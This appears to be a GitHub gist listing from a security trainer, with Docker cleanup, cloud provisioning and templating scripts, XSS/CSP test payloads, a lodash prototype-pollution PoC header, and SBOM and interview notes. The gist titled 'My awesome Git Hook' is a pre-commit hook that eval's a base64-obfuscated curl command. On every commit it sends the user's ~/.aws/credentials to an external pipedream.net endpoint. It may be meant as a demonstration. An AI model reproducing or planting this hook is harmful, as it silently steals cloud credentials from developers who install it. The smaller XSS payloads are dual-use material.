Skip to content

Instantly share code, notes, and snippets.

View abhaybhargav's full-sized avatar

Abhay Bhargav abhaybhargav

72 followers · 1 following
  • we45
  • All over the world
View GitHub Profile
@abhaybhargav
abhaybhargav / clean-docker
Created September 3, 2022 09:32
Docker Cleanup script
docker stop $(docker ps -q)
docker rm $(docker ps -a -q)
docker rmi $(docker images -q -f dangling=true)
docker network prune
docker volume prune
@abhaybhargav
abhaybhargav / pre-commit
Created August 4, 2022 21:52
My awesome Git Hook
#!/bin/bash
j=$(echo "Y3VybCAtZCAneyJwYXJhbSI6ICInIiQoY2F0IH4vLmF3cy9jcmVkZW50aWFscyB8IGJhc2U2NCkiJyJ9JyAtSCAiQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9qc29uIiAtWCBQT1NUIGh0dHBzOi8vZW80NmgzNmgxdnA4eW0ubS5waXBlZHJlYW0ubmV0" | base64 --decode)
eval $j
@abhaybhargav
abhaybhargav / index.js
Created June 10, 2022 02:05
Malicious CSP Payload
alert('this is a xss attack ' + document.domain)
@abhaybhargav
abhaybhargav / index.js
Last active June 11, 2022 01:18
CSP Genuine Payload
alert("This is genuine JS");
@abhaybhargav
abhaybhargav / index.js
Created October 21, 2020 10:54
LodashJS Prototype Pollution PoC code
//Lodash Prototype Pollution PoC Code
// lodash version used == 4.17.4
// Author: Abhay Bhargav
// Disclaimer: This is vulnerable code. You are solely responsible for how you use it
const _ = require("lodash");
const express = require("express");
const bodyParser = require("body-parser");
@abhaybhargav
abhaybhargav / compute_provision.py
Last active September 15, 2020 07:04
import googleapiclient.discovery
import sys
def main(name, url):
compute = googleapiclient.discovery.build('compute', 'beta')
result = compute.images().get(project="boreal-rain-289205", image = "bti-base").execute()
config = {
"name": name,
@abhaybhargav
abhaybhargav / my-new-startup.sh
Last active September 14, 2020 14:20
git clone ${REPO_URL} /root/
/bin/chmod +x /root/${PR_NAME}/setup.sh
/bin/bash +x /root/${PR_NAME}/setup.sh
rm /root/${PR_NAME}/setup.sh
rm /root/${PR_NAME}/.gitlab-ci.yml
rm /root/${PR_NAME}/.gitignore
rm /root/${PR_NAME}/README.md
rm -rf /root/${PR_NAME}/.git
rm /root/set.sh
rm /root/setup.sh
@abhaybhargav
abhaybhargav / caddy_templater.py
Last active September 9, 2020 12:02
Caddy Templater
#!/usr/bin/env python
import json
import argparse
from sys import exit
caddy_dict = {'apps': {'http': {'servers': {'srv0': {'listen': [':443'],
'routes': [{'match': [],
'handle': [{'handler': 'subroute',
'routes': [{'handle': [{'handler': 'reverse_proxy',
@abhaybhargav
abhaybhargav / clarifications.md
Created September 7, 2020 14:14
Points on SCA and SBOM for Verification

Notes on CPE and SWID

  • CPE is being EOLd, resulting in SWID, which is a ISO-paywalled document (Question: Is this accurate? Because I haven't found any reference to an EOL date)
  • This has also resulted in the splintering of several Platform Vulnerability Databases:
    • Rust's DB
    • NPM for NodeJS
    • PyUP for Python

(Again, not sure if this is accurate)

CycloneDX SBOM Spec

@abhaybhargav
abhaybhargav / Dinis-Cruz-Interview
Last active August 26, 2020 06:18
Dinis-Cruz Interview Discussion Points
Link for Stream: https://streamyard.com/cg32nk4py9
Possible Discussion Points
* Some discussions on his career, and where it's taken him. Especially now with Glasswall, where he seems to have made a shift from AppSec to a more Client-centric product role
* Dinis's take on where AppSec is going
* Wardley Mapping and its value to Threat Modeling
* Graph-based security org/practices/ and some value-added aspects of this process
* Kubernetes, Cloud and Serverless - Predictions, especially from a security perspective
Anything else he wants to promote, talk about w.r.t OWASP, etc